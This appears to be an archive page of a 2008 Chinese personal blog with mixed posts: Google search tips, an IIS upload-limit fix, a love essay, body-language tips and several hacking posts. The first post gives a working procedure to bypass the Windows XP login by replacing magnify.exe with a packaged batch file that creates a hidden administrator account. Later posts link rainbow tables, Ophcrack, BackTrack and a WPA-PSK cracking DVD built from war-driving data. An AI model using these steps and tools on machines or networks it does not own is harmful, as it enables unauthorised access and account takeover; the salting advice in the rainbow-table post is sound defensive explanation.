这个方法我亲自实验过,并且成功的绕过了XP的登陆密码.我在学校机房做过实验,但是文件格式为FAT32,就不知道NTFS的行不行?本来想一起实验 的,结果我的光驱在学校机器上用不起(我的光驱有问题,机器太老了!--穷),学校的机器都是FAT32的,没办法!只有下次做了!
先说说思路:方法很简单,当你的机器出现登陆框,要求输入密码时,你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵 呵~~意味着可以运行放大镜)。既然可以运行放大镜程序,那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(我把它换成添加用户的程序不 就…………呵呵~~好坏!)思路就是这样的了!现在我们开始制作。
①.制作U盘启动盘。先运行Usboot,然后插入U盘,选中U盘然后点开始。(要破坏U盘上的文件哦!小心!),格式化完了把U盘拔了,然后它会提示你再插入,插入U盘1分后就可以了!我的U盘是1G的,用的HDD格式。
②.制作替换文件。要制作一个XX.EXE的文件来替换原文件,但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件:

@net user haggy 123456 /add
@net localgroup administrators haggy /add
@exit

然后保存为XX.bat就可以了!
又有人要问我了,我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?
问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!
要达到这样的目的,就要用到winrar,用winrar制作一个自解压文件,不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到 U 盘上去)
③.替换文件.到COMS里去把第一启动换到USB-HDD,保存----插入U盘,进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe (对magnify.exe进行备份,magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下,并该为 magnify.exe就可以了!
然后从硬盘启动就可以了!再到XP登陆密码时,你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!
这样就成功的绕过了XP的登陆密码,只要了一个U盘,好方便.
发帖者 时间: 没有评论:
标签: , ,

2008年11月27日星期四

寿命计算器

寿命计算器的地址是:http://100.51daifu.com/

没事可以算一下.
发帖者 时间: 没有评论:

20条让Google搜索更有效的技巧

google已经成为一个不可或缺的搜索工具,每天被数百万人使用,并渗透到生活的所有层面。无论是工作或学习、研究、寻找电影以及名人的八卦新闻。
本文介绍了20条简单有趣的技巧,让你告别以往费时费力的搜索习惯。从现在起,Tips你的“搜”能力吧!

对上百万人而言,Google是一个每天都要用到的、生活各方面都要用上的不可或缺的搜索工具。从工作、学校、研究、到查找电影、名人、新闻、八卦,Google是一个万事通型的搜索引擎。
除了仅仅输入一个词组然后费力地在一页又一页的搜索结果里查找答案,还有一些方法能让你的搜索更加有效。

这些方法中,有些是众所周知的,你也可能了解的。但有些方法不为人熟知,还有些是大家知道但很少用上的。本文将让你了解更多或记起一些这种能更快更准确地找到答案的最佳方法。

  1. 。Google通常会查找搜索框内输入的所有字词都包含的页面,但如果你希望页面里只含有这个或那个词(或者两个都有),就要用“OR“操作符——或者用”|“符号(管道符号),这样可以少敲几次键盘。例如[dumb | little | man]。
  2. 双引号。如果你希望精确搜索一个短语,给它加上双引号。["dumb little man"]会查出只包含整个词组的页面。[dumb "little man"]则会列出包含dumb这个词和"little man"这个词组的页面。
  3. 不包含。如果你不需要某个词或词组,在它前面加上“-”号。[-dumb little man]会返回包含“little"和"man"但不包含"dumb"的页面。
  4. 近义词。使用“~”号可以返回意义相近的词语。[~dumb little man -dumb]可得到包含“funny little man"和"stupid little man"但不包含“dumb little man"的页面。
  5. 通配符。 “*”号是一个通配符。如果你想查找一首歌的歌词,但记不起具体的歌词时这个方法很有用。 [can't * me love lyrics]会返回你要查找的披头士的歌词。另外当你希望只在某个领域(如教育类信息)中搜索时也可以用这个方法:["dumb little man" research *.edu]
  6. 高级搜索。如果你记不住这些操作符,你还可以随时使用Google的高级搜索
  7. 定义。使用“define:"操作符可以快速地得到某个字词的定义。[define:dumb]会给你列出一大堆对“dumb"这个词的来自各种链接的定义。
  8. 计算器。这是Google最方便的用法之一,在搜索框里输入一条算式就可以很快地得到计算结果。大多数时候比你调用电脑里的计算器程序还要快。用+、-、*、/这些符号和括号就可以做出一条算式。
  9. 数字范围搜索。这个不为人熟知的技巧是用来对某个范围的数字进行搜索。例如,["best books 2002..2007]会列出2002年到2007年间每年最好的书(注意两个数字间有两个英文句号)。
  10. 站内搜索。使用“site:"操作符可以只在指定网站内搜索。[site:dumblittleman.com leo]会只在这个网站里查找包含“leo“这个词的页面。
  11. 反向链接。“link:"操作符可以查出链接至某个网址(URL)的页面。你可以用来查某个主网址,甚至是某个特定的网页。但并不是所有的反向链接都会列出。
  12. 垂直搜索。这个技巧是用来在某个专业领域内,而不是在网络上所有网页里搜索。Google提供了几种特定搜索的方法,可以在博客、新闻、图书等领域内搜索:
  13. 博客搜索
  14. 图书搜索
  15. 学术搜索
  16. 商品搜索
  17. 代码搜索
  18. 网页目录
  19. 财经资讯
  20. 图片搜索
  21. 本地地图
  22. 新闻
  23. 专利搜索
  24. 产品搜索
  25. 视频搜索
  26. 电影。使用"movie:"操作符可以查找电影字幕,如果加上邮政编码或美国的城市名和州名还可得到在该地区的电影院名单和电影放映时间。
  27. 音乐。"music:"操作符可以返回只与音乐相关的内容。
  28. 单位换算。用Google可以做快速的换算,比如将码换算成米,或不同货币间的换算:[12 meters in yards]。
  29. 数字类型:Google的算法可以识别你输入的数字类型,所以你可以搜索:
  30. 电话区号
  31. 车辆识别码(仅适用于美国)
  32. 联邦通讯委员会(FCC)设备编码(仅适用于美国)
  33. 环球产品代码(UPC)
  34. 联邦航空管理局(FAA)飞机登记号(仅适用于美国)
  35. 专利号(仅适用于美国)
  36. 甚至是股票价格(使用股票代码)或最近五天的天气预报
  37. 文件类型。例如,如果你只想查找.PDF文件、Word文档、或EXCEL表格,就可以使用"filetype:"操作符。
  38. 关键词位置。 默认情况下,Google会在整个网页里查找你的关键词。但如果你只想在某个位置里查找,就要用 到"inurl:"、“intitle:"、"intext:"和"inanchor:"这些操作符。它们能让搜索只在网址、网页标题、主体文本和链接锚 文本(用于描述链接的文本)里进行。
  39. 缓存页面。查找Google在其服务器上存储的某个页面的版本?这个技巧可以帮你查找以前的或更新的页面:使用"cached:"操作符。
  40. 生命、宇宙及任何事物的终极答案。用小写字母输入这个短语(Answer to life, the universe, and everything),Google会给你答案
发帖者 时间: 没有评论:
标签: ,

2008年11月26日星期三

男人的真爱只有一次——女人,你珍惜了吗

人们长说痴男怨女,古人已经解释的很清楚了,痴男,男人对爱的痴情,对感情的专一也只有男人自己才知道。女人一辈子可爱上多个男人,而男人却可以同时爱上多个女人,可女人却不知道其实男人一辈子只爱过一个!
  男人真正纯洁的爱只有一次的,当那次爱来了,他会不顾一切,当那次爱死了,也就不会再有了,那次爱的太深,然而痛的也太深。
  所以那次之后男人的爱也就麻木了.男人以后也会爱上别的女孩,只是那种爱却已不再纯洁,包含了欲望,包含了同情,包含了怜惜~~~~~
  女人的心都是水做的,然而最毒也妇人心,所以受伤最多的是女人,伤人最深的也是女人。女人的爱可以有很多次,而男人却永远只有一次的,男人遇到那个最爱的女孩之后把所有的爱都给了她,可有多少女孩懂的珍惜。
  于是男人哭了,男人流泪了,伤心至极而绝望的泪水,慢慢的男人开始亲手去埋葬自己那唯一的爱,把它尘封在自己心底最深处的某个深渊。
  可当夜深人静的时候,他会疯狂的跳进那个深渊,妄图去寻找那次爱的痕迹,哪怕是一丝丝一点点,可结果却跟以往一样的一无所获,只留下自己独自缩在黑暗的角落孤独的一根根抽着寂寞的烟,孤独的流着伤心的泪水。
  当然女人埋怨着男人的花心的时候是否曾想过,男人最珍贵的东西也正是被你们无情的毁灭,当男人羞涩的说着我爱你的时候你珍惜了吗?当男人为你流泪的时候你帮他擦拭了吗?当男人乞求你别离开的时候你回头了吗?
 都说男人花心,可女人何曾知道,男人的花心是因为痴心,爱极而痴,痴极而痛,痛极而死.这次爱灰飞烟灭后男人对爱的心就死了,男人再也不会对女人真心的付出真正的好了,没有了心劲,没有了激情,不再相信真正的爱情,对爱总带着点玩世不恭,有些事,一辈子只有一次。
  当男人全心爱过一个人之后,该付出的付出了,全心努力的去把握过,曾试图给她想要的一切,曾试图为她而死,但回报却是无动于衷,于是在一次次寂寞的等待中,心血一点一滴的滴干了,最后心血全无,心灰意冷,当爱情失去信仰,当感情离开忠一的港湾后,对于男人来说,爱情是什么这一切就都显的无所谓了!男人的心冷了,就再也难以热起来,因为爱过一次之后已经让他失去了爱的能力。
  男人这一生中,最爱的女人真的只有一个,男人自己心里最清楚,如果你是,你能感觉的到吗?感觉到了,请你珍惜!好吗?
发帖者 时间: 没有评论:
标签: ,

[无错版]win2003上传不能超过200k的解决办法(VBS脚本程序法,手动修改法)

来源:http://www.yongfa365.com
原因:
在 IIS 6.0 中,默认设置是特别严格和安全的,这样可以最大限度地减少因以前太宽松的超时和限制而造成的攻击。
配置数据库属性实施的最大 ASP 张贴大小为 204,800 个字节,并将各个字段限制为 100 KB。在 IIS 6.0 之前的版本中,没有这个限制。
view plaincopy to clipboardprint?

1. '把这段代码复制到记事本里然后保存为:win2003-200K.vbs,看好了扩展名为.vbs
2. Set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
3. Set vdirObj=providerObj.Get("IIsWebServiceSetting='W3SVC'")
4. WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
5. vdirObj.AspMaxRequestEntityAllowed=20480000 '可接收多大字节,此处默认为:204800即:200K
6. vdirObj.Put_()
7. WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

'把这段代码复制到记事本里然后保存为:win2003-200K.vbs,看好了扩展名为.vbs
Set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
Set vdirObj=providerObj.Get("IIsWebServiceSetting='W3SVC'")
WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
vdirObj.AspMaxRequestEntityAllowed=20480000 '可接收多大字节,此处默认为:204800即:200K
vdirObj.Put_()
WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

以前在网上看到过以下代码(以下代码是错的,如要直接使用,请使用上边提供的):
view plaincopy to clipboardprint?

1. set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
2. set vdirObj=providerObj.get("IIsWebVirtualDirSetting='W3SVC/1/ROOT'")
3. '输出当前值:
4. WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
5. '设置属性:
6. vdirObj.AspMaxRequestEntityAllowed=204800000' 将属性更改保存在配置数据库中:
7. vdirObj.Put_()
8. '输出更改后的值
9. WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
set vdirObj=providerObj.get("IIsWebVirtualDirSetting='W3SVC/1/ROOT'")
'输出当前值:
WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
'设置属性:
vdirObj.AspMaxRequestEntityAllowed=204800000' 将属性更改保存在配置数据库中:
vdirObj.Put_()
'输出更改后的值
WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

但这个代码在我使用的过程中,有时有用,有时没用,感觉很郁闷,重装系统后就可以,过一段时间就不可以,这次是为了研究这个,找了一堆网页,网上这代码流传太广了,虽然解决不了问题,还在microsoft的"我的wmi坏了"上排除了一遍,还是没找到问题所在,不过他给了我个提示,可能是命名空间不存在,起初我想有时可以有时不可以,不应该是不存在呀,最后发现'W3SVC/1/ROOT'这个东西我的机器上根本就没有,而重装的系统上有这个,想了想,这里的"1"不会是IIS的默认站点吧,安全需要,每次做安全设置时把这个站点都删除了,当然没有了,马上试了一下,NND,得亏我虚拟计算机多,试起来容易,真是这个问题,只有没有这个站点就会有这样的错误提示(呵呵,两个版,一个中文版提示,一个英文版提示,为了研究这个把好多个版本都搬出来了):

---------------------------
Windows 脚本宿主
---------------------------
脚本: D:\My system\桌面\200K.vbs
行: 2
字符: 1
错误: 系统找不到指定的路径。
代码: 80070003
源: SWbemServicesEx

---------------------------
确定
---------------------------

---------------------------
Windows Script Host
---------------------------
Script: C:\Documents and Settings\Administrator\Desktop\200k.vbs
Line: 2
Char: 1
Error: The system cannot find the path specified.
Code: 80070003
Source: SWbemServicesEx

---------------------------
OK
---------------------------

呵呵,说远了,上面说到第一个代码是正确的,保存后直接双击这个文件运行就可以了,他会先显示当前允许上传的大小,然后显示修改后的大小

一般上面的操作一定成功。万一不成功的话呢:

二、直接修改配置文件

先在服务里关闭iis admin service服务
找到windows\system32\inetsrv\下的metabase.xml,
打开,找到ASPMaxRequestEntityAllowed 把他修改为需要的值,
然后重启iis admin service服务

也可以这样:Win+R-->cmd-->net stop iisadmin-->改windows\system32\inetsrv\下的 metabase.xml--->cmd-->net start iisadmin-->net start w3svc

三、下载微软IIS专用管理工具:

IIS6 Resource Kit Tools(http://www.microsoft.com/downloads/details.aspx?FamilyID=56FC92EE-A71A-4C73-B628-ADE629C89499&displaylang=en),安装后利用Metabase Explorer修改了(local)\LM\W3SVC\AspMaxRequestEntityAllowed属性(默认为 200K=204800),修改为1G就是了;同时修改了AspScriptTimeout属性调整下时限,就可以上传大文件了。




一、 脚本修改法win2003-200K.vbs[推荐]

这就造成了文件上传不能超过200k,而事实上是提交数据不能超过200k,你可以发一个很长的帖子试试,也会出现这个错误

解决办法:见此文第一个示例。
发帖者 时间: 没有评论:
标签: , , ,

2008年11月25日星期二

[译稿]具有中国特色的 Firefox 浏览器

新闻来源:ReadWriteWeb.com
不同文化导致不同的上网习惯,在欧美,网民身体前倾,右手执鼠,左手敲键,很忙活,而中国的网民则身体靠在椅背上,右手移动鼠标,另一只手闲着。这是 Mozilla 公司的 Firefox 主管 Mike Beltzner 最近访问中国时发现的一个现象。



他表示,中国人倾向于让信息蹦出来然后对感兴趣的内容进行研究,而不象西方人那样出动去搜索相关资料,搜索虽然重要,但对中国人来说并不是首要的东西。为了适应这种不同的文化,Mozilla 在北京的机构谋智网络推出来 Firefox 中国版,以满足中国网民的上网习惯。



Firefox 中国版包含以下对中国用户来说非常实用的功能:

  • 那些欧美用户常用的快捷键被设计成可以直接用鼠标操作。
  • 借鉴了一些 Maxthon 功能,如双击关闭标签。
  • 工具条上有一个下拉框,可以快速访问一些常用的系统工具,如计算器,记事本,抓屏,图片编辑等。
  • 图片或重要内容拖存。
所有这些功能,被打包在 Firefox 中国版中,Firefox 中国版并非要取代 Firefox 中文版,而是作为一个拥有更多本地功能的选项供某些用户下载使用。

本文来源:http://www.readwriteweb.com/archives/firefox_china_edition_everything_a_local_browser_should_be.php
中文翻译:COMSHARP CMS
发帖者 时间: 没有评论:
标签:

120G彩虹表HTTP下载

下载地址1 Http://hash.0x54.com 铁通
下载地址2 Http://hash2.0x54.com 电信
备用地址1 Http://hash.t00ls.net 铁通
备用地址2 Http://hash2.t00ls.net 电信
发帖者 时间: 没有评论:
标签:

2008年11月23日星期日

认识彩虹哈希表破解工具 [军区国防部专用的]

跨平台密码破解器Ophcrack的破解速度简直是不可思议。到底有多快呢?它能在160秒内破解“Fgpyyih804423”这个密码。很多人 都认为这个密码已经相当安全了。微软的密码强度判定工具认为该密码的安全级别是“强”。而Geekwisdom密码强度估算器认为该密码的安全强度是“普 通”。

Ophcrack的破解速度为什么会这么快呢?这是因为它使用了彩虹表。我说的不是我用做桌面背景的那种真正的彩虹。

不过,彩虹表也是很美的。

要想理解彩虹表的工作原理,首先你得明白计算机是如何存储密码的,不管是在你自己用的台式机还是在远程的网络服务器那里。

密码决不会存储在纯文本文档中的。至少我们不应当这么做,除非你用的是世界上最幼稚的程序,而且你的目的就是构建世界上最不安全的系统。事实上,我 们应当把密码作为哈希函数的输出值来存储。哈希是单向操作。即使攻击者能够读取密码的哈希表,他也不可能仅仅通过那个哈希表来重构密码。

但是攻击者可以用用彩虹哈希表来攻击密码的哈希表:通过庞大的、针对各种可能的字母组合预先计算好的哈希值。攻击者的计算机当然也可以在运行中计算 所有的值,但是利用这个预先计算好哈希值的庞大表格,显然能够使攻击者能更快地执行级数规模的命令——假设攻击机器有足够大的RAM来将整个表存储到内存 中(或者至少是表的大部分)。这就是个很典型的时间-内存权衡问题,尤其是黑客更倾向于使用这种捷径。

彩虹表有多庞大呢?Ophcrack的安装对话话会让你有个大致概念:

生成这些庞大的彩虹表需要花很长时间,但是一旦生成好了,那么每个攻击的计算机都可以利用这些表来破解更强的密码哈希表。

可用的最小彩虹表是最基本的字母数字表,就这样它的大小就有388MB。这是Ophcrack启动盘默认的表。即使这个最小的表也相当有效了。我曾经用它来攻击我在一个Windows XP虚拟机上设置的密码,结果如下:

found? seconds
Password1! 700
Fgpyyih804423 yes 159
Fgpyyih80442% 700
saMejus9 yes 140
thequickbrownfoxjumpsoverthelazydog 700


当然,你用这种彩虹表无法破解那种带有非数字字母的字符的密码(比如%&^$#这样的),因为表里根本没有包含这些字符。你可能也注意到了那些 passphrase,我也很喜欢它们,由于它们本身的长度问题,passphrase对此项技术是免疫的。但是,话又说回来了,该攻击可以在11分钟内 破解所有可能14位数字字母密码组合中的99.9%,这还是用了最小的彩虹表。表越大、越全,攻击破解能力越强。Ophcrack文档描述了它所能使用的 彩虹表之间的差异:

字母数字表 10k 388MB 包含所有字母数字混合密码中99.9%的LanManager表。这些都是用大小写字母和数字组成的密码(大约800亿组合)。

由于LanManager哈希表将密码截成每份7个字符的两份,我们就可以用该表破解长度在1到14之间的密码。由于LanManager哈希表也是不区分大小写的,该表中的800亿的组合就相当于12*10的11次方(或者2的83次方)个密码。

字母数字表 5k 720MB 包含所有字母数字组合的密码中99.9%的LanManager表。但是,由于表变成2倍大,如果你的计算机有1GB以上的RAM空间的话,它的破解速度是前一个的4倍。

扩展表 7.5GB 包含最长14个大小写字母、数字以及下列33个特殊字符(!"#$%&'()*+,-./:;<=>?@[\]^_`{|} ~)组成的密码中96%的LanManager表。该表中大约有7兆的组合,5*10的12次方(或者2的92次方)密码。

NT 8.5 GB 我们可以使用该表来破解计算机上的NT哈希表,这是LanManager 哈希表所做不到的。该表包含了用如下字符组成的可能密码组合的90%:

·最高6位字符由大小写字母、数字以及33个特殊字符(同上面列举的一样)

·7 大小写字母及数字

·8 小写字母及数字

该表包含7兆种组合,对应7兆的密码(NT哈希表不存在LanManager哈希表的弱点)。

需要注意的是,所有这些彩虹表都有其特定适用的密码长度和字母组合。太长的密码,或者包含表中没有的字符,那么用彩虹表就无法破解。

不幸的是,由于旧式LanManager哈希表不可饶恕的缺点,Windows服务器特别容易被彩虹表攻击。令我吃惊的是,Windows Server 2003在默认状态下竟然还支持该旧式Lan Manager。我强烈建议大家禁用Lan Manager哈希表,尤其是在那些存储所有用户的域证书的服务器上一定要禁用该哈希表。这将对你的所有Windows98用户造成很大的不便,但是我觉 得为了提高安全性,这么做是值得的。

我听说明年发布的Windows Server2008最终会将LanManager哈希表去掉。Windows Vista已经不支持这些过时的哈希表了。在Vista系统中运行OphCrack的话结果请看下列对话框:

所有LM哈希表都是空的。请使用NT哈希表来破解剩余哈希表。我希望我能用NT表,但是我找不到要用8.5GBNT哈希的彩虹表的可靠来源。

Ophcrack工具不是很灵活。它不允许你自己生成彩虹表。因此,你得用Project彩虹破解工具,该工具能用来破解几乎所有字母组合以及任何 哈希算法。但是,你得当心,彩虹表攻击最近才盛行的原因是由于电脑的2-4GB的内存最近才达到了让人能接受的水平。我的意思是说它很庞大。

下面是攻击安全性能更高的NT哈希表所需要生成的彩虹表的大小:

Character Set Length Table Size
ABCDEFGHIJKLMNOPQRSTUVWXYZ 14 0.6 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 14 3 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= 14 24 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ 14 64 GB


通常对台式机来说,用彩虹表攻击太夸张了。如果黑客能实现物理意义上访问主机,那么就没有任何安全性可言了。这是10项计算机安全不可变法则中的第3条。一旦黑客可以在物理意义上访问主机,那么他可以用很多工具来重新设置密码。

但是如果远程黑客从服务器或者数据库获得大量的密码的哈希列表,我们就有麻烦了。这种情况下,我们遭受彩虹表攻击的风险非常大。因此你决不能只依靠 哈希技术——你总得给哈希表加些花样,这样得到的哈希值就与众不同了。给哈希表加花样,听起来很复杂(隐约还能感觉到很美味?),但其实很简单。在生成哈 希表之前,给密码加个唯一的前缀就行:

hash = md5('deliciously-salty-' + password)


这样,攻击者就无法用彩虹表来攻击你了——“密码”和“美味的鲜密码”生成的哈希结果是不匹配的。除非黑客知道你所有的哈希表都加了这个前缀。即使真的知道,他/她也得专门针对你的机器生成一个定制的彩虹表。

iso下载地址

http://jaist.dl.sourceforge.net/sourceforge/ophcrack/ophcrack-livecd-1.0.iso


本篇文章来源于 中国知音博客 转载请以链接形式注明出处 网址:www.bycnboy.comhttp://www.bycnboy.com/article.asp?id=816

发帖者 时间: 没有评论:
标签: ,

2008年11月22日星期六

查询qq注册时间(具体注册日期)

在写申诉的时候是不是不记得自己号码什么时候注册的,或者买了别人的号,一直不知道

用户可以查看自己QQ是什么时候注册的

地址:http://user.10.qq.com/home
: x; H9 F$ U }暗组论坛,暗组2009,暗组远控,DarkstRat2008,社会工程暗安全技术小组 - 带着梦想从这里起飞" {9 O( o& K& J, C* q% e
发帖者 时间: 没有评论:
标签:

用社工追MM策略图

本文转自暗组技术论坛:http://www.darkst.com
转载请注明出处

用社工追MM策略图点击图片可以放大!


发帖者 时间: 1 条评论:
标签: ,

2008年11月21日星期五

haggy 版360安全卫士

360安全卫士是一款安全类上网辅助软件

它是免费的,"haggy"版主要功能有:
·拦截恶意钓鱼网站,防网银账户、游戏帐号、QQ号丢失
·全面查杀9000余款流行木马,370款恶意软件
·发布微软官方漏洞信息、修复388个系统漏洞,有效防止恶意软
件通过漏洞传播
·举报恶意软件,与数百万网友共享软件经验
·赠送价值320元的正版卡巴斯基杀毒V6.0,7*24小时全面服务
·阅读"haggy"的博客,第一时间抢沙发
·分享"haggy"的相册,评评我的新片片


下载地址是:http://my.360safe.com/download.html?id=1737063

发帖者 时间: 没有评论:
标签: ,

美国联邦调查局(FBI)阅人秘籍

和陌生人第一次见面时,要如何在一开始谈话的几分钟内,了解这个人?如何和对方拉近距离?如何找到对方喜爱的话题?如何让对方愿意开口?

这都得依靠细心而入微的观察,谈到这里就不能不提最近声名大噪的乔.纳瓦罗。

他 曾经担任美国联邦调查局干员长达25年时间,是反间谍情报小组的行为分析专家,退休后成为美国知名的扑克牌教练。去年他出版了《牌桌上的阅人术》,借助他 在担任探员期间所练就的观察力,教导玩家如何透过眼神、肢体动作的观察,看透对方的心思,在牌桌上给予对方致命一击。

观察力可以靠后天练习

练习你的观察力,最有效的方法之一是“回想游戏”。你可以在任何时候、任何地方练习。例如,当你走进一个房间之后,闭上眼睛,尽可能回想走进房间之前你看到了什么,愈详细愈好。

时间久了,你也可以像纳瓦罗一样,走到朋友家的前门,就已经把周遭环境看清楚了:门前街道上停了哪些厂牌的车、隔壁房屋外有位男性在除草、另一间房子的门前放着两份报纸……

当你观察完周遭环境之后,还要再问自己,这些代表什么意义?例如,除草的人应该就住在那间房子里,因为门前的街道上没有停放任何除草公司的车辆。

纳瓦罗每次坐上牌桌,第一件事就是观察同桌的对手,包括他们的脸部表情、双手放的位置、坐姿、穿着打扮。

更重要的是竞赛过程中,他会特别注意对手的行为是否出现异常。例如原本放在牌桌上的双手突然环抱在胸前或放在大腿上,可能代表情势变得对他不利。

如果对方将身体往后移,然后跷脚而坐,这就是自信的表现,代表情势对他非常有利。

观察不寻常的动作

当人在紧张或是有压力时,常会不自觉做出某些动作:

1.触摸或按摩颈部:另外,按摩额头或是摸耳垂,也都是一般人紧张时会出现的动作。而如果男生拉着领带,或是女生玩弄颈上的项链,也代表同样的意思。

2.深呼吸或是话变多:当你看到对方深呼吸,就知道他可能在压抑情绪。或是在过程中对方不太爱说话,却突然话多起来,也代表他的情绪开始变得不稳定。

3.用手放在大腿上:紧张时我们会不自觉地双手放在大腿上来回摩擦,试图平缓自己的情绪。

从肢体语言看出对方个性

常见的习惯动作反映了特定的个性与行为模式:

1.喜欢眨眼:这种人心胸狭隘,不太能够信任。如果和这种人进行交涉或有事请托时,最好直截了当地说明。

2.习惯盯着别人看:代表警戒心很强,不容易表露内心情感,所以面对他们,避免出现过度热情或是开玩笑的言语。

3.喜欢提高音量说话:多半是自我主义者,对自己很有自信,如果你认为自己不适合奉承别人,最好和这种人划清界线。

4.穿着不拘小节:也代表个性随和,而且面对人情压力时容易屈服,所以有事情找他们商量时,最好是套交情,远比透过公事上的关系要来得有效。

5.一坐下就跷脚:这种人充满企图心与自信,而且有行动力,下定决心后会立刻行动。

6.边说话边摸下巴:通常个性谨慎,警戒心也强。

7.将两手环抱在胸前:做事非常谨慎,行动力强,坚持己见。

多搜寻其他周边线索

不过,外表只是线索之一,你还可以从其他不同的来源,搜寻关于对方的重要信息。

你可以从笔迹下手:字迹潦草而写字速度很快的人,工作速度也很快,但是通常比较马虎粗糙;写字谨慎而慢的人,工作时会边确认边进行,非常仔细。

此外,手机吊饰也是很好的线索。吊饰复杂的人,通常朋友很多,是属于怕寂寞、喜欢热闹的类型。没有配戴手机吊饰,即使有也是式样简单的人,不大喜欢一群人在一起吵吵嚷嚷,只与少数能真正交心的人长久交往。

只要平时多与人互动、多观察,你也能拥有惊人的阅人能力。
发帖者 时间: 没有评论:
标签:

BackTrack 3 正式版下载

Description: CD Image
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7

Download: Click here



Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: Click here



Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: Click here


发帖者 时间: 没有评论:
标签: , ,

无线安全破解专用WPA-PSK Hash Table DVD下载地址汇总 - [Wireless Hack]

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://bigpack.blogbus.com/logs/31359696.html

此次由ZerOne安全团队制作的无线安全破解专用DVD光盘,其中包含的WPA 破解 Hash Table已全部经过测试可用,所含SSID均为ZerOne安全团队在对多个省会城市进行多次实地War-Driving无线探测基础上,从汇总数据中精心挑选出国内使用频率最高的前62个SSID整理而成。光盘里除了包含多达40余种8位以上生日类密码组合外,还包括了8位以上普通用户常用密码组合,总容量达4.4GB。实为无线安全密码破解测试、无线渗透测试及安全评估之必备利器。

该DVD光盘内除了主要包含的大容量WPA-PSK/WPA2-PSK 破解用 Hash Table以外,为方便大家学习及借鉴,还附赠了由ZerOne安全团队近年来进行省会城市War-Driving的官方探测汇总报告,此外,还准备了相关无线安全教程的文档及资源列表。希望借此给大家研究无线网络安全带来实质性的帮助。

哈,作为国内第一张无线安全破解专用WPA-PSK Hash Table DVD,除实用价值外,也极具收藏和纪念意义!!

由于光盘体积过大,所以HTTP下载目前暂不可用,下为目前公开的下载方式及地址汇总:
WPA-PSK/WPA2-PSK光盘BT下载
种子一:http://bigpack.blogbus.com/files/12266612070.torrent

上述种子中的DVD光盘镜像文件已压缩,从ISO压成RAR,大约减少了900M,可为所有下载的朋友节省许多时间

种子文件物征码:60a0cca09203ed9b309c95047f3333acb1661d32 分块大小: 512 KB

种子二: http://bigpack.blogbus.com/files/12266612980.torrent

---------------------------------------------------------------------------

纳米盘下载

共22个分包。该资源比较大,需纳米机器人下载。没装纳米机器人,点此安装纳米机器人
ZerOne WPA HASH.part01.rar
ZerOne WPA HASH.part02.rar
ZerOne WPA HASH.part03.rar
ZerOne WPA HASH.part04.rar
ZerOne WPA HASH.part05.rar
ZerOne WPA HASH.part06.rar
ZerOne WPA HASH.part07.rar
ZerOne WPA HASH.part08.rar
ZerOne WPA HASH.part09.rar
ZerOne WPA HASH.part10.rar
ZerOne WPA HASH.part11.rar
ZerOne WPA HASH.part12.rar
ZerOne WPA HASH.part13.rar
ZerOne WPA HASH.part14.rar
ZerOne WPA HASH.part15.rar
ZerOne WPA HASH.part16.rar
ZerOne WPA HASH.part17.rar
ZerOne WPA HASH.part18.rar
ZerOne WPA HASH.part19.rar
ZerOne WPA HASH.part20.rar
ZerOne WPA HASH.part21.rar
ZerOne WPA HASH.part22.rar

感谢所有无线安全爱好者、朋友们的贡献与分流,感谢长久以来各位的支持与鼓励。请继续支持ZerOne安全团队。

发帖者 时间: 没有评论:
标签: , , , , ,
订阅: 博文 (Atom)